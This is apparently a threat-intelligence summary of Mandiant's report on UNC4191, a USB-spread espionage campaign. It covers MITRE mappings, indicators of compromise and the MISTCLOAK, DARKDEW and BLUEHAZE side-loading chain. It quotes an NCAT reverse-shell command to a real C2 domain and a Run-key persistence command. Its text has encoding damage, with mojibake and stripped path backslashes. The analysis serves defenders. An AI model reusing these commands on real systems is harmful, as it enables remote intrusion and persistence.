Keypoints
- Initial infection vector is removable USB devices; users execute renamed signed apps from the drive root to trigger payloads.
- Threat actor sideâloads malicious DLLs using legitimate signed binaries (USB Network Gate, Razer Chromium Render Process) to launch MISTCLOAK, DARKDEW, and BLUEHAZE.
- DARKDEW copies files from removable media to C:ProgramDataudisk, creates persistence (HKCU Run key âudiskâ), and continuously scans to infect additional removable drives.
- BLUEHAZE uses a renamed Razer binary to load RzLog4CPP.dll, deploy a staging folder C:UsersPublicLibrariesCNNUDTV, create an HKCU Run entry âACNTVâ, and execute a renamed NCAT (wuwebv.exe) to attempt a reverse shell to closed.theworkpc[.]com:80.
- The campaignâs malware propagates via infected removable drives (worming capability), enabling potential exfiltration from airâgapped systems.
- Mandiant developed YARA rules and Managed Defense detections (process paths, registry Run modifications, NCAT/NETCAT usage) to identify and hunt similar activity.
MITRE Techniques
- [T1091] Replication Through Removable Media â UNC4191 begins when âa user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volumeâ (âa user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volumeâ).
- [T1574.002] DLL SideâLoading â The campaign sideâloads malicious DLLs: âThe renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device (T1574.002)â and Razer binary loads RzLog4CPP.dll to call BLUEHAZE (âThe renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device⌠loads the legitimate file rzlog4cpp_logger.dll, which calls the getRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startupâ).
- [T1074.001] Local Data Staging/Copy to Removable Media â DARKDEW âcopies every file from :autorun.infProtection for AutorunSystem Volume Information to C:ProgramDataudiskâ and copies files back to removable media for propagation (âcopies every file from <drive>:autorun.infProtection for AutorunSystem Volume Information to C:ProgramDataudiskâ).
- [T1547.001] Registry Run Keys/Startup Folder â Established persistence via HKCU Run keys: value âudiskâ executing c:programdataudiskdisk_watch.exe and âACNTVâ executing DateCheck.exe (âKey: HKCUSoftwareMicrosoftWindowsCurrentVersionRun Value: udisk Text: c:programdataudiskdisk_watch.exeâ and reg add ⌠/v ACNTV ⌠âRundll32.exe SHELL32.DLL,ShellExec_RunDLL âC:UsersPublicLibrariesCNNUDTVDateCheck.exeââ).
- [T1059] Command and Scripting Interpreter â BLUEHAZE/NCAT execution uses cmd to run NCAT reverse shell: âcmd.exe /C wuwebv.exe -t -e c:windowssystem32cmd.exe closed.theworkpc[.]com 80â.
- [T1482] Domain Trust Discovery â Mandiant observed actors âenumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002) within a several minute spanâ (âthreat actors enumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002)â).
- [T1069.001] Permission Groups Discovery â Used to query local group permissions as observed in hunting telemetry (âquerying domain and local group permissions (T1069.001, T1069.002)â).
- [T1069.002] Permission Groups Discovery â Used to query domain group permissions as observed in hunting telemetry (âquerying domain and local group permissions (T1069.001, T1069.002)â).
- [T1136.001] Create Local Account â Appears in technique sequencing examples used by hunters: âcreation of a local account (T1136.001) and then addition to the local Administrators group (T1098)â (âcreation of a local account (T1136.001) and then addition to the local Administrators group (T1098)â).
- [T1098] Account Manipulation â Example sequence included adding accounts to local Administrators in hunting examples (âcreation of a local account (T1136.001) and then addition to the local Administrators group (T1098)â).
- [T1059.003] Windows Command Shell â Hunting missions included âCommand and Scripting Interpreter: Windows Command Shell (T1059.003)â as a focus area (âMandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our âMandiant Intelligence: Staging Directoriesâ and âCommand and Scripting Interpreter: Windows Command Shell (T1059.003)â hunting missionsâ).
- [T1036] Masquerading â Files and binaries are renamed or differ from original filed metadata (e.g., OriginalFileName: UsbConfig.exe but File Name: Removable Disk.exe) to masquerade as legitimate applications (âOriginalFileName: UsbConfig.exe File Name: Removable Disk.exe, USB Drive.exeâ).
- [T1060] Registry Run Keys / Startup â Detection mapping flagged âRegistry Run key persistence for binary in PROGRAMDATAâ showing use of registry for persistence (âRegistry Key: HKCUSoftwareMicrosoftWindowsCurrentVersionRun Value: udisk Text: c:programdataudiskdisk_watch.exeâ).
- [T1218.011] Signed Binary Proxy Execution: Rundll32 â BLUEHAZE uses a RunDLL32 invocation to persistently execute the staged DateCheck.exe via registry (âreg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v ACNTV /t REG_SZ /d âRundll32.exe SHELL32.DLL,ShellExec_RunDLL âC:UsersPublicLibrariesCNNUDTVDateCheck.exeââ /fâ).
Indicators of Compromise
- [Domain] NCAT C2 â closed.theworkpc[.]com
- [MD5] MISTCLOAK sample and usb.ini â 7753da1d7466f251b60673841a97ac5a (MISTCLOAK), c10abb9f88f485d38e25bc5a0e757d1e (usb.ini), and 3 more hashes
- [MD5] DARKDEW payloads â 6900cf5937287a7ae87d90a4b4b4dec5 (DARKDEW decrypted payload)
- [MD5] BLUEHAZE and NCAT â f632e4b9d663d69edaa8224a43b59033 (BLUEHAZE), 8ec339a89ec786b2aea556bedee679c7 (NCAT)
- [MD5] Legitimate signed binaries used for sideâloading â f45726a9508376fdd335004fca65392a, 707de51327f6cae5679dee8e4e2202ba (USB Network Gate), ea7f5b7fdb1e637e4e73f6bf43dcf090 (Razer Chromium Render Process)
- [File Path] Staging and persistence locations â C:ProgramDataudisk (file and malware staging), C:UsersPublicLibrariesCNNUDTV (BLUEHAZE staging)
The intrusion chain starts when a user executes a renamed, signed application from the root of a removable drive (e.g., âRemovable Drive.exeâ or âUSB Drive.exeâ), which sideâloads a MISTCLOAK DLL (u2ec.dll) from the drive and launches an encrypted payload (usb.ini). MISTCLOAK acts as a launcher that decrypts and executes the chained payload stored on disk; the codebase references a PDB path containing Chinese characters that translate to âDisk Hijacking,â indicating development context.
The decrypted payloads implement a threeâphase workflow: DARKDEW (dropper) copies files from the removable media into C:ProgramDataudisk, drops renamed legitimate binaries (disk_watch.exe, DateCheck.exe), registers persistence under HKCUSoftwareMicrosoftWindowsCurrentVersionRun (udisk), and, when running as disk_watch.exe, polls volumes A:âZ: to locate removable drives and copy a hidden autorun.infProtection for Autorun folder structure onto them to propagate. BLUEHAZE is sideâloaded via a renamed Razer binary (DateCheck.exe) that loads RzLog4CPP.dll (RzLog4CPP.dll contains BLUEHAZE code), creates C:UsersPublicLibrariesCNNUDTV, persists with an âACNTVâ Run key, and executes a renamed NCAT (wuwebv.exe) to attempt a reverse shell.
The observed NCAT command line performs a reverse shell to closed.theworkpc[.]com:80 using âwuwebv.exe -t -e c:windowssystem32cmd.exe closed.theworkpc[.]com 80â. The overall behavior combines DLL sideâloading, registry Runâkey persistence, scheduled scanning for removable media, file staging in ProgramData and Public Libraries, and propagation via infected USB devices â enabling lateral compromise of additional hosts and potential data transfer from airâgapped systems.
Read more: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia